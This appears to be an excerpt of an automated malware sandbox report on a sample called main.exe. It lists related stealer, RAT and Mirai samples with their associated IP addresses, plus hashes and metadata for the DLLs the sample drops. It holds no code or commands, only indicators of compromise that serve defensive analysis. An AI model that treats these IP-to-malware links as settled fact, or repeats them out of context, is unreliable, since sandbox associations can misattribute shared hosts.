• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
15:43:18 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                  urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 94.139.32.3
                                                                                                                                                                                                                                  Kameta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                                                                                                                                                                                                                  • 45.112.123.126
                                                                                                                                                                                                                                  ip-api.comHX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  TUT-ASUSHX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                  • 208.95.112.1
                                                                                                                                                                                                                                  AMAZON-02USnshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 52.25.84.238
                                                                                                                                                                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 18.195.151.252
                                                                                                                                                                                                                                  sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 13.50.244.72
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  • 185.166.143.50
                                                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 18.163.241.112
                                                                                                                                                                                                                                  m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 18.183.188.74
                                                                                                                                                                                                                                  star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                  • 76.223.52.162
                                                                                                                                                                                                                                  nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 54.153.44.160
                                                                                                                                                                                                                                  nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 18.163.241.121
                                                                                                                                                                                                                                  nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 54.181.79.122
                                                                                                                                                                                                                                  No context
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pyd
Process: C:\Users\user\Desktop\main.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 4.640339306680604
Encrypted: false
SSDEEP: 192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
MD5: BCD8CAAF9342AB891BB1D8DD45EF0098
SHA1: EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
SHA-256: 78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
SHA-512: 8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: chos.exe, Detection: malicious
• Filename: ihost.exe, Detection: malicious
• Filename: shost.exe, Detection: malicious
• Filename: lz4wnSavmK.exe, Detection: malicious
• Filename: WVuXCNNYG0.exe, Detection: malicious
• Filename: dipwo1iToJ.exe, Detection: malicious
• Filename: ROh2ijuEpr.exe, Detection: malicious
• Filename: zed.exe, Detection: malicious
• Filename: back.ps1, Detection: malicious
• Filename: zed.exe, Detection: malicious
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                                                      Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                                      MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                                      SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                                      SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                                      SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                                      MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                                      SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                                      SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                                      SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14336
                                                                                                                                                                                                                                                      Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                                      MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                                      SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                                      SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                                      SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                                                      Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                                      MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                                      SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                                      SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                                      SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                                                                                      Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                                      MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                                      SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                                      SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                                      SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                                      MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                                      SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                                      SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                                      SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20992
                                                                                                                                                                                                                                                      Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                                      MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                                      SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                                      SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                                      SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24576
                                                                                                                                                                                                                                                      Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                                      MD5:2E15AA6F97ED618A3236CFA920988142
                                                                                                                                                                                                                                                      SHA1:A9D556D54519D3E91FA19A936ED291A33C0D1141
                                                                                                                                                                                                                                                      SHA-256:516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
                                                                                                                                                                                                                                                      SHA-512:A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                                                      Entropy (8bit):4.7080156150187396
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
                                                                                                                                                                                                                                                      MD5:40390F2113DC2A9D6CFAE7127F6BA329
                                                                                                                                                                                                                                                      SHA1:9C886C33A20B3F76B37AA9B10A6954F3C8981772
                                                                                                                                                                                                                                                      SHA-256:6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
                                                                                                                                                                                                                                                      SHA-512:617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):5.159963979391524
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
                                                                                                                                                                                                                                                      MD5:899895C0ED6830C4C9A3328CC7DF95B6
                                                                                                                                                                                                                                                      SHA1:C02F14EBDA8B631195068266BA20E03210ABEABC
                                                                                                                                                                                                                                                      SHA-256:18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
                                                                                                                                                                                                                                                      SHA-512:0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                                                      Entropy (8bit):5.270418334522813
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
                                                                                                                                                                                                                                                      MD5:C4C525B081F8A0927091178F5F2EE103
                                                                                                                                                                                                                                                      SHA1:A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
                                                                                                                                                                                                                                                      SHA-256:4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
                                                                                                                                                                                                                                                      SHA-512:7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):56832
                                                                                                                                                                                                                                                      Entropy (8bit):4.231032526864278
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
                                                                                                                                                                                                                                                      MD5:F9E266F763175B8F6FD4154275F8E2F0
                                                                                                                                                                                                                                                      SHA1:8BE457700D58356BC2FA7390940611709A0E5473
                                                                                                                                                                                                                                                      SHA-256:14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
                                                                                                                                                                                                                                                      SHA-512:EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                      Entropy (8bit):4.252429732285762
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
                                                                                                                                                                                                                                                      MD5:DECF524B2D53FCD7D4FA726F00B3E5FC
                                                                                                                                                                                                                                                      SHA1:E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
                                                                                                                                                                                                                                                      SHA-256:58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
                                                                                                                                                                                                                                                      SHA-512:EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.690163963718492
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
                                                                                                                                                                                                                                                      MD5:80BB1E0E06ACAF03A0B1D4EF30D14BE7
                                                                                                                                                                                                                                                      SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
                                                                                                                                                                                                                                                      SHA-256:5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
                                                                                                                                                                                                                                                      SHA-512:2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22016
                                                                                                                                                                                                                                                      Entropy (8bit):6.1215844022564285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
                                                                                                                                                                                                                                                      MD5:3727271FE04ECB6D5E49E936095E95BC
                                                                                                                                                                                                                                                      SHA1:46182698689A849A8C210A8BF571D5F574C6F5B1
                                                                                                                                                                                                                                                      SHA-256:3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
                                                                                                                                                                                                                                                      SHA-512:5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                                                      Entropy (8bit):5.293810509074883
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
                                                                                                                                                                                                                                                      MD5:78AEF441C9152A17DD4DC40C7CC9DF69
                                                                                                                                                                                                                                                      SHA1:6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
                                                                                                                                                                                                                                                      SHA-256:56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
                                                                                                                                                                                                                                                      SHA-512:27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11776
                                                                                                                                                                                                                                                      Entropy (8bit):4.862619033406922
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
                                                                                                                                                                                                                                                      MD5:19E0ABF76B274C12FF624A16713F4999
                                                                                                                                                                                                                                                      SHA1:A4B370F556B925F7126BF87F70263D1705C3A0DB
                                                                                                                                                                                                                                                      SHA-256:D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
                                                                                                                                                                                                                                                      SHA-512:D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14336
                                                                                                                                                                                                                                                      Entropy (8bit):5.227045547076371
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
                                                                                                                                                                                                                                                      MD5:309D6F6B0DD022EBD9214F445CAC7BB9
                                                                                                                                                                                                                                                      SHA1:ABD22690B7AD77782CFC0D2393D0C038E16070B0
